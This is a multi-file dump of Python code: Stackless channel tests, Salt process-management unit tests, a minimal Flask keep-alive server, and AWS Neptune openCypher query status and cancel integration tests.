"""Test using close semantics with channels"""
def setUp(self):
super(TestClose, self).setUp()
self.c = stackless.channel()
# TODO: This test shows how ill conceived the current closing/closed semantics are.
# See https://bitbucket.org/stackless-dev/stackless/issues/53
def testSequence(self):
def sender():
self.c.send_sequence(range(10))
self.c.close()
# this needs to change, close does not wake up a receiver, we must pump it
while self.c.closing and not self.c.closed:
self.c.send(None)
data = []
def receiver():
for i in self.c:
data.append(i)
# remove the extra "pump" nones at the end....
while data[-1] is None:
data.pop(-1)
data.append(10)
stackless.tasklet(sender)()
stackless.tasklet(receiver)()
stackless.run()
self.assertEqual(data, list(range(11)))
self.assertTrue(self.c.closed)
def testSequence2(self):
def sender():
length = self.c.send_sequence(range(10))
self.assertEqual(length, 10)
# A future version of Stackless may send StopIteration
# automatically, if you close the channel
# See https://bitbucket.org/stackless-dev/stackless/issues/53
self.c.send_exception(StopIteration)
self.c.close()
data = []
def receiver():
for i in self.c:
data.append(i)
stackless.tasklet(sender)()
stackless.tasklet(receiver)()
stackless.run()
self.assertEqual(data, list(range(10)))
self.assertTrue(self.c.closed)
def testSender(self):
self.c.close()
self.assertRaises(ValueError, self.c.send, None)
def testReceiver(self):
self.c.close()
self.assertRaises(ValueError, self.c.receive)
def testIterator(self):
self.c.close()
i = iter(self.c)
def n():
return next(i)
self.assertRaises(StopIteration, n)
class Subclassing(StacklessTestCase):
def test_init(self):
"""Test that we can subclass channel without overriding __new__"""
class myclass(stackless.channel):
def __init__(self, name):
super(myclass, self).__init__()
self.name = name
name = "bong"
c = myclass(name)
self.assertEqual(c.name, name)
if __name__ == '__main__':
if not sys.argv[1:]:
sys.argv.append('-v')
unittest.main()
|
test_process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import io
import os
import sys
import threading
import time
import signal
import multiprocessing
import functools
import datetime
import warnings
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
patch,
NO_MOCK,
NO_MOCK_REASON
)
# Import salt libs
import salt.utils.platform
import salt.utils.process
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin
import psutil
def die(func):
'''
Add proc title
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _die():
salt.utils.process.appendproctitle('test_{0}'.format(name))
setattr(self, 'die_' + name, _die)
return wrapper
def incr(func):
'''
Increment counter
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _incr(counter, num):
salt.utils.process.appendproctitle('test_{0}'.format(name))
for _ in range(0, num):
counter.value += 1
setattr(self, 'incr_' + name, _incr)
return wrapper
def spin(func):
'''
Spin indefinitely
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _spin():
salt.utils.process.appendproctitle('test_{0}'.format(name))
while True:
time.sleep(1)
setattr(self, 'spin_' + name, _spin)
return wrapper
class TestProcessManager(TestCase):
@spin
def test_basic(self):
'''
Make sure that the process is alive 2s later
'''
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_basic)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid == next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@spin
def test_kill(self):
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_kill)
initial_pid = next(six.iterkeys(process_manager._process_map))
# kill the child
if salt.utils.platform.is_windows():
os.kill(initial_pid, signal.SIGTERM)
else:
os.kill(initial_pid, signal.SIGKILL)
# give the OS time to give the signal...
time.sleep(0.1)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@die
def test_restarting(self):
'''
Make sure that the process is alive 2s later
'''
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.die_restarting)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
    @skipIf(sys.version_info < (2, 7), 'Needs Python >= 2.7 due to bug in stdlib')
@incr
def test_counter(self):
counter = multiprocessing.Value('i', 0)
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.incr_counter, args=(counter, 2))
time.sleep(1)
process_manager.check_children()
time.sleep(1)
# we should have had 2 processes go at it
try:
assert counter.value == 4
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
class TestThreadPool(TestCase):
def test_basic(self):
'''
Make sure the threadpool can do things
'''
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value('i', 0)
pool = salt.utils.process.ThreadPool()
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
time.sleep(1) # Sleep to let the threads do things
self.assertEqual(counter.value, 1)
self.assertEqual(pool._job_queue.qsize(), 0)
def test_full_queue(self):
'''
Make sure that a full threadpool acts as we expect
'''
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value('i', 0)
# Create a pool with no workers and 1 queue size
pool = salt.utils.process.ThreadPool(0, 1)
# make sure we can put the one item in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
# make sure we can't put more in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertFalse(sent)
time.sleep(1) # Sleep to let the threads do things
# make sure no one updated the counter
self.assertEqual(counter.value, 0)
# make sure the queue is still full
self.assertEqual(pool._job_queue.qsize(), 1)
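# A hedged, generic sketch of the behaviour the two tests above rely on: a
# bounded fire-and-forget pool whose fire_async() returns False instead of
# blocking when its job queue is full. This is an illustration only, not the
# actual salt.utils.process.ThreadPool implementation.
from salt.ext.six.moves import queue as _sketch_queue  # pylint: disable=import-error


class _BoundedFireAndForgetPool(object):
    def __init__(self, num_threads=1, queue_size=1):
        self._job_queue = _sketch_queue.Queue(maxsize=queue_size)
        for _ in range(num_threads):
            worker = threading.Thread(target=self._run_jobs)
            worker.daemon = True
            worker.start()

    def _run_jobs(self):
        while True:
            func, args = self._job_queue.get()
            try:
                func(*args)
            finally:
                self._job_queue.task_done()

    def fire_async(self, func, args=()):
        # Non-blocking submit: report failure rather than waiting for space.
        try:
            self._job_queue.put_nowait((func, args))
            return True
        except _sketch_queue.Full:
            return False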
class TestProcess(TestCase):
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_daemonize_if(self):
# pylint: disable=assignment-from-none
with patch('sys.argv', ['salt-call']):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
ret = salt.utils.process.daemonize_if({'multiprocessing': False})
self.assertEqual(None, ret)
with patch('sys.platform', 'win'):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
with patch('salt.utils.process.daemonize'), \
patch('sys.platform', 'linux2'):
salt.utils.process.daemonize_if({})
self.assertTrue(salt.utils.process.daemonize.called)
# pylint: enable=assignment-from-none
class TestSignalHandlingProcess(TestCase):
@classmethod
def Process(cls, pid):
raise psutil.NoSuchProcess(pid)
@classmethod
def target(cls):
os.kill(os.getpid(), signal.SIGTERM)
@classmethod
def children(cls, *args, **kwargs):
raise psutil.NoSuchProcess(1)
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_process_does_not_exist(self):
try:
with patch('psutil.Process', self.Process):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_process_children_do_not_exist(self):
try:
with patch('psutil.Process.children', self.children):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@staticmethod
def run_forever_sub_target(evt):
'Used by run_forever_target to create a sub-process'
while not evt.is_set():
time.sleep(1)
@staticmethod
def run_forever_target(sub_target, evt):
'A target that will run forever or until an event is set'
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@staticmethod
def kill_target_sub_proc():
pid = os.fork()
if pid == 0:
return
pid = os.fork()
if pid == 0:
return
time.sleep(.1)
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
pass
@skipIf(sys.platform.startswith('win'), 'No os.fork on Windows')
def test_signal_processing_regression_test(self):
evt = multiprocessing.Event()
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.run_forever_target,
args=(self.run_forever_sub_target, evt)
)
sh_proc.start()
proc = multiprocessing.Process(target=self.kill_target_sub_proc)
proc.start()
proc.join()
# When the bug exists, the kill_target_sub_proc signal will kill both
# processes. sh_proc will be alive if the bug is fixed
try:
assert sh_proc.is_alive()
finally:
evt.set()
sh_proc.join()
@staticmethod
def no_op_target():
pass
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_signal_processing_test_after_fork_called(self):
        'Validate Process and subclasses call after-fork methods'
evt = multiprocessing.Event()
sig_to_mock = 'salt.utils.process.SignalHandlingProcess._setup_signals'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
with patch(sig_to_mock) as ma, patch(log_to_mock) as mb:
self.sh_proc = salt.utils.process.SignalHandlingProcess(target=self.no_op_target)
self.sh_proc.run()
ma.assert_called()
mb.assert_called()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_signal_processing_test_final_methods_called(self):
        'Validate Process and subclasses call finalize methods'
evt = multiprocessing.Event()
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
sig_to_mock = 'salt.utils.process.SignalHandlingProcess._setup_signals'
# Mock _setup_signals so we do not register one for this process.
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
self.sh_proc = salt.utils.process.SignalHandlingProcess(target=self.no_op_target)
self.sh_proc.run()
ma.assert_called()
mb.assert_called()
@staticmethod
def pid_setting_target(sub_target, val, evt):
val.value = os.getpid()
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@skipIf(sys.platform.startswith('win'), 'Required signals not supported on windows')
def test_signal_processing_handle_signals_called(self):
'Validate SignalHandlingProcess handles signals'
        # Global event to stop all processes we're creating
evt = multiprocessing.Event()
# Create a process to test signal handler
val = multiprocessing.Value('i', 0)
proc = salt.utils.process.SignalHandlingProcess(
target=self.pid_setting_target,
args=(self.run_forever_sub_target, val, evt),
)
proc.start()
# Create a second process that should not respond to SIGINT or SIGTERM
proc2 = multiprocessing.Process(
target=self.run_forever_target,
args=(self.run_forever_sub_target, evt),
)
proc2.start()
        # Wait for the sub process to set its pid
while not val.value:
time.sleep(.3)
assert not proc.signal_handled()
# Send a signal that should get handled by the subprocess
os.kill(val.value, signal.SIGTERM)
# wait up to 10 seconds for signal handler:
start = time.time()
while time.time() - start < 10:
if proc.signal_handled():
break
time.sleep(.3)
try:
            # Allow some time for the signal handler to do its thing
assert proc.signal_handled()
# Reap the signaled process
proc.join(1)
assert proc2.is_alive()
finally:
evt.set()
proc2.join(30)
proc.join(30)
class TestDup2(TestCase):
def test_dup2_no_fileno(self):
'The dup2 method does not fail on streams without fileno support'
f1 = io.StringIO("some initial text data")
f2 = io.StringIO("some initial other text data")
with self.assertRaises(io.UnsupportedOperation):
f1.fileno()
with patch('os.dup2') as dup_mock:
try:
salt.utils.process.dup2(f1, f2)
except io.UnsupportedOperation:
assert False, 'io.UnsupportedOperation was raised'
assert not dup_mock.called
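# A hedged sketch of the defensive behaviour the test above describes: only
# call os.dup2 when both streams expose a usable fileno(). It mirrors the
# intent of salt.utils.process.dup2 but is an illustration, not the actual
# implementation.
def _sketch_dup2(file1, file2):
    try:
        fileno1 = file1.fileno()
        fileno2 = file2.fileno()
    except (AttributeError, io.UnsupportedOperation):
        # One stream (e.g. io.StringIO) has no OS-level descriptor, so there
        # is nothing to duplicate; silently skip instead of raising.
        return
    os.dup2(fileno1, fileno2)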
def null_target():
pass
def event_target(event):
while True:
if event.wait(5):
break
class TestProcessList(TestCase):
@staticmethod
def wait_for_proc(proc, timeout=10):
start = time.time()
while proc.is_alive():
if time.time() - start > timeout:
raise Exception("Process did not finishe before timeout")
time.sleep(.3)
def test_process_list_process(self):
plist = salt.utils.process.SubprocessList()
proc = multiprocessing.Process(target=null_target)
proc.start()
plist.add(proc)
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
def test_process_list_thread(self):
plist = salt.utils.process.SubprocessList()
thread = threading.Thread(target=null_target)
thread.start()
plist.add(thread)
assert thread in plist.processes
self.wait_for_proc(thread)
assert not thread.is_alive()
plist.cleanup()
assert thread not in plist.processes
def test_process_list_cleanup(self):
plist = salt.utils.process.SubprocessList()
event = multiprocessing.Event()
proc = multiprocessing.Process(target=event_target, args=[event])
proc.start()
plist.add(proc)
assert proc in plist.processes
plist.cleanup()
event.set()
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
class TestDeprecatedClassNames(TestCase):
def process_target(self):
time.sleep(1)
def test_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings('always', '', DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch('salt.utils.versions._get_utcnow_date', return_value=fake_utcnow):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.MultiprocessingProcess(target=self.process_target)
self.assertEqual(
'Please stop using \'salt.utils.process.MultiprocessingProcess\' '
'and instead use \'salt.utils.process.Process\'. '
'\'salt.utils.process.MultiprocessingProcess\' will go away '
'after 2022-01-01.',
six.text_type(recorded_warnings[0].message)
)
finally:
if proc is not None:
del proc
def test_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch('salt.utils.versions._get_utcnow_date', return_value=fake_utcnow):
with self.assertRaisesRegex(
RuntimeError,
r'Please stop using \'salt.utils.process.MultiprocessingProcess\' '
r'and instead use \'salt.utils.process.Process\'. '
r'\'salt.utils.process.MultiprocessingProcess\' will go away '
r'after 2022-01-01. '
r'This warning\(now exception\) triggered on '
r'filename \'(.*)test_process.py\', line number ([\d]+), is '
r'supposed to be shown until ([\d-]+). Today is ([\d-]+). '
r'Please remove the warning.'):
proc = salt.utils.process.MultiprocessingProcess(target=self.process_target)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings('always', '', DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch('salt.utils.versions._get_utcnow_date', return_value=fake_utcnow):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(target=self.process_target)
self.assertEqual(
'Please stop using \'salt.utils.process.SignalHandlingMultiprocessingProcess\' '
'and instead use \'salt.utils.process.SignalHandlingProcess\'. '
'\'salt.utils.process.SignalHandlingMultiprocessingProcess\' will go away '
'after 2022-01-01.',
six.text_type(recorded_warnings[0].message)
)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch('salt.utils.versions._get_utcnow_date', return_value=fake_utcnow):
with self.assertRaisesRegex(
RuntimeError,
r'Please stop using \'salt.utils.process.SignalHandlingMultiprocessingProcess\' '
r'and instead use \'salt.utils.process.SignalHandlingProcess\'. '
r'\'salt.utils.process.SignalHandlingMultiprocessingProcess\' will go away '
r'after 2022-01-01. '
r'This warning\(now exception\) triggered on '
r'filename \'(.*)test_process.py\', line number ([\d]+), is '
r'supposed to be shown until ([\d-]+). Today is ([\d-]+). '
r'Please remove the warning.'):
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(target=self.process_target)
finally:
if proc is not None:
del proc
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am Alfred!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
test_opencypher_status_without_iam.py
|
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import threading
import logging
import time
import requests
from test.integration.DataDrivenOpenCypherTest import DataDrivenOpenCypherTest
logger = logging.getLogger('TestOpenCypherStatusWithoutIam')
class TestOpenCypherStatusWithoutIam(DataDrivenOpenCypherTest):
    def do_opencypher_query_save_result(self, query, res):
        try:
            response = self.client.opencypher_http(query)
            response.raise_for_status()
            res['result'] = response.json()
        except requests.HTTPError as exception:
            res['error'] = exception.response.json()
def setUp(self) -> None:
super().setUp()
res = self.client.opencypher_status()
res.raise_for_status()
status = res.json()
for q in status['queries']:
self.client.opencypher_cancel(q['queryId'])
def test_do_opencypher_status_nonexistent(self):
query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce"
status = self.client.opencypher_status(query_id)
assert status.status_code != 200
err = status.json()
self.assertEqual(err['code'], "InvalidParameterException")
expected_message = f'Supplied queryId {query_id} is invalid'
self.assertEqual(err['detailedMessage'], expected_message)
def test_do_opencypher_cancel_nonexistent(self):
query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce"
res = self.client.opencypher_cancel(query_id)
assert res.status_code != 200
err = res.json()
self.assertEqual(err['code'], "InvalidParameterException")
expected_message = f'Supplied queryId {query_id} is invalid'
self.assertEqual(err['detailedMessage'], expected_message)
def test_do_opencypher_cancel_empty_query_id(self):
with self.assertRaises(ValueError):
self.client.opencypher_cancel('')
def test_do_opencypher_cancel_non_str_query_id(self):
with self.assertRaises(ValueError):
self.client.opencypher_cancel(42)
def test_do_opencypher_status_and_cancel(self):
query = '''MATCH(a)-->(b)
MATCH(c)-->(d)
MATCH(e)-->(f)
RETURN a,b,c,d,e,f'''
query_res = {}
oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,))
oc_query_thread.start()
time.sleep(1)
res = self.client.opencypher_status()
res.raise_for_status()
status_res = res.json()
assert 'acceptedQueryCount' in status_res
assert 'runningQueryCount' in status_res
assert status_res['runningQueryCount'] >= 1
assert 'queries' in status_res
query_id = ''
for q in status_res['queries']:
if query in q['queryString']:
query_id = q['queryId']
assert query_id != ''
res = self.client.opencypher_cancel(query_id)
res.raise_for_status()
cancel_res = res.json()
assert cancel_res['status'] == '200 OK'
oc_query_thread.join()
assert 'error' in query_res
assert 'code' in query_res['error']
assert 'requestId' in query_res['error']
assert 'detailedMessage' in query_res['error']
assert 'CancelledByUserException' == query_res['error']['code']
    def test_do_opencypher_status_and_cancel_silently(self):
query = '''MATCH(a)-->(b)
MATCH(c)-->(d)
RETURN a,b,c,d'''
query_res = {}
oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,))
oc_query_thread.start()
time.sleep(3)
query_id = ''
status = self.client.opencypher_status(query_id)
assert status.status_code == 200
status_res = status.json()
assert type(status_res) is dict
assert 'acceptedQueryCount' in status_res
assert 'runningQueryCount' in status_res
assert 1 == status_res['runningQueryCount']
assert 'queries' in status_res
query_id = ''
for q in status_res['queries']:
if query in q['queryString']:
query_id = q['queryId']
        self.assertNotEqual(query_id, '')
cancel = self.client.opencypher_cancel(query_id)
cancel_res = cancel.json()
assert type(cancel_res) is dict
assert cancel_res['status'] == '200 OK'
oc_query_thread.join()
assert type(query_res['result']) is dict
assert 'a' in query_res['result']['head']['vars']
assert 'b' in query_res['result']['head']['vars']
assert 'c' in query_res['result']['head']['vars']
assert 'd' in query_res['result']['head']['vars']
assert [] == query_res['result']['results']['bindings']
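# A hedged helper sketch built only from calls already used above
# (client.opencypher_status(), the 'queries'/'queryId'/'queryString' fields).
# It polls the status endpoint until the submitted query shows up, which is
# sturdier than the fixed time.sleep() the tests use; it is not part of the
# test suite and is never called.
def _sketch_wait_for_query_id(client, query_text, timeout_sec=10):
    deadline = time.time() + timeout_sec
    while time.time() < deadline:
        status = client.opencypher_status()
        status.raise_for_status()
        for q in status.json().get('queries', []):
            if query_text in q['queryString']:
                return q['queryId']
        time.sleep(0.25)
    return ''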
|